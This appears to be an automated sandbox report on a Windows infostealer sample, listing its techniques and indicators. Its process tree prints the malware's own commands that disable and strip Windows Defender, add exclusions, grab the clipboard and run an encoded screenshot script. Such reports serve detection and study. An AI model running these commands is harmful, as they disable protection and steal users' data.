15eb82e01bff66f9070d3efa1c5549f7268c5d2917abad748b243a3653b5ba2d

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-10-2024 23:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Qsr7YteuS.exe
Size

6.9MB
MD5

992db1843fa3b9ecb41c21cf0f2e6bb3
SHA1

ec27c5a987e0cb6e6684e82a411d99823d978db4
SHA256

15eb82e01bff66f9070d3efa1c5549f7268c5d2917abad748b243a3653b5ba2d
SHA512

152959d38f8fe5c0481c1b46ec61a8451fda9d9033a0e76fe7913aaf841e8fa2aaf1a168e02ffa445c4ae86772d029838fff27cdb588a55fa60182df713f34c7
SSDEEP

98304:8g+zHqdVfB2FS2/KyuT/9vUIdD9C+z3zO917vOTh+ezDNh7w8mJ1nmOBr9n4m9t9:83QsobT/9bvLz3S1bA3zIn9VDj

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2200	powershell.exe
4416	powershell.exe
4024	powershell.exe
1776	powershell.exe
1348	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Qsr7YteuS.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3616	cmd.exe
1580	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5060	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe
3632	Qsr7YteuS.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
30	discord.com
31	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
28	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4828	tasklist.exe
3916	tasklist.exe
1380	tasklist.exe
3252	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cad-21.dat	upx
behavioral2/memory/3632-25-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp	upx
behavioral2/files/0x0008000000023c9f-27.dat	upx
behavioral2/files/0x0007000000023cab-29.dat	upx
behavioral2/files/0x0007000000023ca7-46.dat	upx
behavioral2/memory/3632-48-0x00007FFB9F500000-0x00007FFB9F50F000-memory.dmp	upx
behavioral2/files/0x0007000000023ca6-45.dat	upx
behavioral2/files/0x0007000000023ca5-44.dat	upx
behavioral2/files/0x0007000000023ca4-43.dat	upx
behavioral2/files/0x0007000000023ca3-42.dat	upx
behavioral2/files/0x0007000000023ca2-41.dat	upx
behavioral2/files/0x0007000000023ca0-40.dat	upx
behavioral2/files/0x0007000000023c9e-39.dat	upx
behavioral2/files/0x0007000000023cb2-38.dat	upx
behavioral2/files/0x0007000000023cb1-37.dat	upx
behavioral2/files/0x0007000000023cb0-36.dat	upx
behavioral2/files/0x0007000000023cac-33.dat	upx
behavioral2/files/0x0007000000023caa-32.dat	upx
behavioral2/memory/3632-47-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp	upx
behavioral2/memory/3632-54-0x00007FFB99010000-0x00007FFB9903D000-memory.dmp	upx
behavioral2/memory/3632-56-0x00007FFB991B0000-0x00007FFB991C9000-memory.dmp	upx
behavioral2/memory/3632-58-0x00007FFB98FE0000-0x00007FFB99003000-memory.dmp	upx
behavioral2/memory/3632-60-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp	upx
behavioral2/memory/3632-64-0x00007FFB9A170000-0x00007FFB9A17D000-memory.dmp	upx
behavioral2/memory/3632-63-0x00007FFB9A7D0000-0x00007FFB9A7E9000-memory.dmp	upx
behavioral2/memory/3632-66-0x00007FFB9A140000-0x00007FFB9A16E000-memory.dmp	upx
behavioral2/memory/3632-68-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp	upx
behavioral2/memory/3632-69-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp	upx
behavioral2/memory/3632-70-0x00007FFB94960000-0x00007FFB94A18000-memory.dmp	upx
behavioral2/memory/3632-73-0x00007FFB88DE0000-0x00007FFB89158000-memory.dmp	upx
behavioral2/memory/3632-76-0x00007FFB9A0E0000-0x00007FFB9A0F4000-memory.dmp	upx
behavioral2/memory/3632-78-0x00007FFB9A0D0000-0x00007FFB9A0DD000-memory.dmp	upx
behavioral2/memory/3632-83-0x00007FFB89D90000-0x00007FFB89EAC000-memory.dmp	upx
behavioral2/memory/3632-82-0x00007FFB98FE0000-0x00007FFB99003000-memory.dmp	upx
behavioral2/memory/3632-159-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp	upx
behavioral2/memory/3632-160-0x00007FFB9A7D0000-0x00007FFB9A7E9000-memory.dmp	upx
behavioral2/memory/3632-269-0x00007FFB9A140000-0x00007FFB9A16E000-memory.dmp	upx
behavioral2/memory/3632-285-0x00007FFB94960000-0x00007FFB94A18000-memory.dmp	upx
behavioral2/memory/3632-287-0x00007FFB88DE0000-0x00007FFB89158000-memory.dmp	upx
behavioral2/memory/3632-310-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp	upx
behavioral2/memory/3632-315-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp	upx
behavioral2/memory/3632-309-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp	upx
behavioral2/memory/3632-340-0x00007FFB9F500000-0x00007FFB9F50F000-memory.dmp	upx
behavioral2/memory/3632-348-0x00007FFB9A140000-0x00007FFB9A16E000-memory.dmp	upx
behavioral2/memory/3632-347-0x00007FFB9A7D0000-0x00007FFB9A7E9000-memory.dmp	upx
behavioral2/memory/3632-346-0x00007FFB9A170000-0x00007FFB9A17D000-memory.dmp	upx
behavioral2/memory/3632-345-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp	upx
behavioral2/memory/3632-344-0x00007FFB98FE0000-0x00007FFB99003000-memory.dmp	upx
behavioral2/memory/3632-343-0x00007FFB991B0000-0x00007FFB991C9000-memory.dmp	upx
behavioral2/memory/3632-342-0x00007FFB99010000-0x00007FFB9903D000-memory.dmp	upx
behavioral2/memory/3632-341-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp	upx
behavioral2/memory/3632-339-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp	upx
behavioral2/memory/3632-338-0x00007FFB89D90000-0x00007FFB89EAC000-memory.dmp	upx
behavioral2/memory/3632-337-0x00007FFB9A0D0000-0x00007FFB9A0DD000-memory.dmp	upx
behavioral2/memory/3632-336-0x00007FFB9A0E0000-0x00007FFB9A0F4000-memory.dmp	upx
behavioral2/memory/3632-334-0x00007FFB94960000-0x00007FFB94A18000-memory.dmp	upx
behavioral2/memory/3632-335-0x00007FFB88DE0000-0x00007FFB89158000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3860	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4324	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
1348	powershell.exe
1348	powershell.exe
1776	powershell.exe
1776	powershell.exe
2200	powershell.exe
2200	powershell.exe
2200	powershell.exe
1348	powershell.exe
1348	powershell.exe
1776	powershell.exe
1776	powershell.exe
1580	powershell.exe
1580	powershell.exe
3196	powershell.exe
3196	powershell.exe
1580	powershell.exe
3196	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
996	powershell.exe
996	powershell.exe
996	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
1540	powershell.exe
1540	powershell.exe
1540	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	3252	tasklist.exe
Token: SeDebugPrivilege	1380	tasklist.exe
Token: SeDebugPrivilege	4828	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3248	WMIC.exe
Token: SeSecurityPrivilege	3248	WMIC.exe
Token: SeTakeOwnershipPrivilege	3248	WMIC.exe
Token: SeLoadDriverPrivilege	3248	WMIC.exe
Token: SeSystemProfilePrivilege	3248	WMIC.exe
Token: SeSystemtimePrivilege	3248	WMIC.exe
Token: SeProfSingleProcessPrivilege	3248	WMIC.exe
Token: SeIncBasePriorityPrivilege	3248	WMIC.exe
Token: SeCreatePagefilePrivilege	3248	WMIC.exe
Token: SeBackupPrivilege	3248	WMIC.exe
Token: SeRestorePrivilege	3248	WMIC.exe
Token: SeShutdownPrivilege	3248	WMIC.exe
Token: SeDebugPrivilege	3248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3248	WMIC.exe
Token: SeRemoteShutdownPrivilege	3248	WMIC.exe
Token: SeUndockPrivilege	3248	WMIC.exe
Token: SeManageVolumePrivilege	3248	WMIC.exe
Token: 33	3248	WMIC.exe
Token: 34	3248	WMIC.exe
Token: 35	3248	WMIC.exe
Token: 36	3248	WMIC.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeIncreaseQuotaPrivilege	3248	WMIC.exe
Token: SeSecurityPrivilege	3248	WMIC.exe
Token: SeTakeOwnershipPrivilege	3248	WMIC.exe
Token: SeLoadDriverPrivilege	3248	WMIC.exe
Token: SeSystemProfilePrivilege	3248	WMIC.exe
Token: SeSystemtimePrivilege	3248	WMIC.exe
Token: SeProfSingleProcessPrivilege	3248	WMIC.exe
Token: SeIncBasePriorityPrivilege	3248	WMIC.exe
Token: SeCreatePagefilePrivilege	3248	WMIC.exe
Token: SeBackupPrivilege	3248	WMIC.exe
Token: SeRestorePrivilege	3248	WMIC.exe
Token: SeShutdownPrivilege	3248	WMIC.exe
Token: SeDebugPrivilege	3248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3248	WMIC.exe
Token: SeRemoteShutdownPrivilege	3248	WMIC.exe
Token: SeUndockPrivilege	3248	WMIC.exe
Token: SeManageVolumePrivilege	3248	WMIC.exe
Token: 33	3248	WMIC.exe
Token: 34	3248	WMIC.exe
Token: 35	3248	WMIC.exe
Token: 36	3248	WMIC.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	3916	tasklist.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeIncreaseQuotaPrivilege	3440	WMIC.exe
Token: SeSecurityPrivilege	3440	WMIC.exe
Token: SeTakeOwnershipPrivilege	3440	WMIC.exe
Token: SeLoadDriverPrivilege	3440	WMIC.exe
Token: SeSystemProfilePrivilege	3440	WMIC.exe
Token: SeSystemtimePrivilege	3440	WMIC.exe
Token: SeProfSingleProcessPrivilege	3440	WMIC.exe
Token: SeIncBasePriorityPrivilege	3440	WMIC.exe
Token: SeCreatePagefilePrivilege	3440	WMIC.exe
Token: SeBackupPrivilege	3440	WMIC.exe
Token: SeRestorePrivilege	3440	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4356 wrote to memory of 3632	4356	Qsr7YteuS.exe	86
PID 4356 wrote to memory of 3632	4356	Qsr7YteuS.exe	86
PID 3632 wrote to memory of 3636	3632	Qsr7YteuS.exe	90
PID 3632 wrote to memory of 3636	3632	Qsr7YteuS.exe	90
PID 3632 wrote to memory of 1224	3632	Qsr7YteuS.exe	91
PID 3632 wrote to memory of 1224	3632	Qsr7YteuS.exe	91
PID 3632 wrote to memory of 1588	3632	Qsr7YteuS.exe	92
PID 3632 wrote to memory of 1588	3632	Qsr7YteuS.exe	92
PID 3632 wrote to memory of 4808	3632	Qsr7YteuS.exe	95
PID 3632 wrote to memory of 4808	3632	Qsr7YteuS.exe	95
PID 1588 wrote to memory of 3384	1588	cmd.exe	98
PID 1588 wrote to memory of 3384	1588	cmd.exe	98
PID 1224 wrote to memory of 2200	1224	cmd.exe	99
PID 1224 wrote to memory of 2200	1224	cmd.exe	99
PID 3636 wrote to memory of 1776	3636	cmd.exe	100
PID 3636 wrote to memory of 1776	3636	cmd.exe	100
PID 4808 wrote to memory of 1348	4808	cmd.exe	101
PID 4808 wrote to memory of 1348	4808	cmd.exe	101
PID 3632 wrote to memory of 3964	3632	Qsr7YteuS.exe	102
PID 3632 wrote to memory of 3964	3632	Qsr7YteuS.exe	102
PID 3632 wrote to memory of 4140	3632	Qsr7YteuS.exe	103
PID 3632 wrote to memory of 4140	3632	Qsr7YteuS.exe	103
PID 4140 wrote to memory of 1380	4140	cmd.exe	106
PID 4140 wrote to memory of 1380	4140	cmd.exe	106
PID 3964 wrote to memory of 3252	3964	cmd.exe	107
PID 3964 wrote to memory of 3252	3964	cmd.exe	107
PID 3632 wrote to memory of 1020	3632	Qsr7YteuS.exe	108
PID 3632 wrote to memory of 1020	3632	Qsr7YteuS.exe	108
PID 3632 wrote to memory of 3616	3632	Qsr7YteuS.exe	109
PID 3632 wrote to memory of 3616	3632	Qsr7YteuS.exe	109
PID 3632 wrote to memory of 2924	3632	Qsr7YteuS.exe	112
PID 3632 wrote to memory of 2924	3632	Qsr7YteuS.exe	112
PID 3632 wrote to memory of 116	3632	Qsr7YteuS.exe	114
PID 3632 wrote to memory of 116	3632	Qsr7YteuS.exe	114
PID 3632 wrote to memory of 4008	3632	Qsr7YteuS.exe	116
PID 3632 wrote to memory of 4008	3632	Qsr7YteuS.exe	116
PID 3632 wrote to memory of 4100	3632	Qsr7YteuS.exe	117
PID 3632 wrote to memory of 4100	3632	Qsr7YteuS.exe	117
PID 3632 wrote to memory of 4364	3632	Qsr7YteuS.exe	118
PID 3632 wrote to memory of 4364	3632	Qsr7YteuS.exe	118
PID 2924 wrote to memory of 4828	2924	cmd.exe	121
PID 2924 wrote to memory of 4828	2924	cmd.exe	121
PID 1020 wrote to memory of 3248	1020	cmd.exe	124
PID 1020 wrote to memory of 3248	1020	cmd.exe	124
PID 3616 wrote to memory of 1580	3616	cmd.exe	125
PID 3616 wrote to memory of 1580	3616	cmd.exe	125
PID 116 wrote to memory of 1356	116	cmd.exe	126
PID 116 wrote to memory of 1356	116	cmd.exe	126
PID 4008 wrote to memory of 4324	4008	cmd.exe	127
PID 4008 wrote to memory of 4324	4008	cmd.exe	127
PID 4100 wrote to memory of 4516	4100	cmd.exe	128
PID 4100 wrote to memory of 4516	4100	cmd.exe	128
PID 4364 wrote to memory of 3196	4364	cmd.exe	129
PID 4364 wrote to memory of 3196	4364	cmd.exe	129
PID 3632 wrote to memory of 1108	3632	Qsr7YteuS.exe	151
PID 3632 wrote to memory of 1108	3632	Qsr7YteuS.exe	151
PID 1108 wrote to memory of 3436	1108	cmd.exe	132
PID 1108 wrote to memory of 3436	1108	cmd.exe	132
PID 3632 wrote to memory of 2192	3632	Qsr7YteuS.exe	133
PID 3632 wrote to memory of 2192	3632	Qsr7YteuS.exe	133
PID 3632 wrote to memory of 936	3632	Qsr7YteuS.exe	134
PID 3632 wrote to memory of 936	3632	Qsr7YteuS.exe	134
PID 936 wrote to memory of 2268	936	cmd.exe	138
PID 936 wrote to memory of 2268	936	cmd.exe	138

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3448	attrib.exe
3848	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Qsr7YteuS.exe
"C:\Users\Admin\AppData\Local\Temp\Qsr7YteuS.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4356
- C:\Users\Admin\AppData\Local\Temp\Qsr7YteuS.exe
  "C:\Users\Admin\AppData\Local\Temp\Qsr7YteuS.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Qsr7YteuS.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Qsr7YteuS.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('DISABLE VIRTULIZATION DM #iowneac', 0, 'disable virt ', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('DISABLE VIRTULIZATION DM #iowneac', 0, 'disable virt ', 0+16);close()"
      4⤵
      PID:3384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:116
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4100
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBl